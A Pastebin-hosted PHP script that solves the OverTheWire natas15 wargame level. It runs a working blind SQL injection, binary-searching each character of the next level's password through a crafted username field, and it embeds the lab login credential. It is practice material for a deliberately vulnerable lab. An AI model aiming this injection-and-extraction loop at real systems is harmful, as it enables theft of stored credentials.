Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * Gets the response from the server when POSTed with $post_data
- *
- * @param array $post_data Array containing the POST parameters
- * @throws Exception When curl fails
- * @return string Response from server
- */
- function get_server_response(array $post_data) {
- $ch = curl_init();
- $post_data_string = http_build_query($post_data);
- curl_setopt($ch, CURLOPT_URL, "http://natas15.natas.labs.overthewire.org");
- //curl_setopt($ch, CURLOPT_URL, "http://localhost/PHPStorm_Workshop/natas/natas15_test.php"); // Debug
- curl_setopt($ch, CURLOPT_USERPWD, "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_string);
- $response = curl_exec($ch);
- if($response === false) {
- throw new Exception("curl failed.");
- }
- return $response;
- }
- /**
- * <p>
- * Generates payload that tests whether ``$test_char`` is GREATER THAN the character at ``$search_index``.<br>
- * Comparison is done using ASCII values of the characters.
- * </p>
- *
- * <p>Runs the following exploit query:</p>
- * ```
- * $remote_query ="SELECT * FROM users WHERE username=\"natas16\" AND ASCII(SUBSTR(users.password, {$search_index}, 1)) > ASCII(\"{$test_char}\") -- Comment for the rest of the $remote_query"
- * ```
- *
- *
- * @param string $test_char Test character
- * @param int $search_index Index of Test character
- * @return array Associative array payload
- */
- function generate_exploit_payload(string $test_char, int $search_index) {
- $search_index++; // Increment search index by 1 because in MySQL we start counting from 1 instead of 0.
- $exploit_code = "ASCII(\"{$test_char}\") > ASCII(SUBSTR(users.password, {$search_index}, 1))";
- $post_data = array(
- "username" => "natas16\" AND $exploit_code -- Comment"
- );
- return $post_data;
- }
- /**
- * Tests whether ``$char`` is GREATER THAN the password's char at ``$index``.
- * Comparison is done based on ASCII values.
- *
- * @param string $char Character to test
- * @param int $index Index of character
- * @return bool
- */
- function execute_exploit(string $char, int $index) {
- $payload = generate_exploit_payload($char, $index);
- $response = "";
- try {
- $response = get_server_response($payload);
- } catch (Exception $e) { // TODO Add better exception handling
- echo "ERROR: " . $e->getMessage();
- }
- return (strpos($response, "This user exists.") !== false);
- }
- $possible_letters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
- $password = "";
- for($password_index = 0; $password_index < 32; $password_index++) {
- $min_index = 0;
- $max_index = strlen($possible_letters) - 1;
- while ($max_index > $min_index) {
- $test_index = intdiv($max_index + $min_index, 2);
- $test_char = $possible_letters[$test_index];
- $test_char_greater_than = execute_exploit($test_char, $password_index);
- if($max_index - $min_index === 1) {
- if($test_char_greater_than) {
- $test_char = $possible_letters[$max_index];
- } else {
- $test_char = $possible_letters[$min_index];
- }
- break;
- } else {
- if ($test_char_greater_than) {
- $max_index = $test_index;
- } else {
- $min_index = $test_index;
- }
- }
- }
- $password .= $test_char;
- }
- echo $password;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement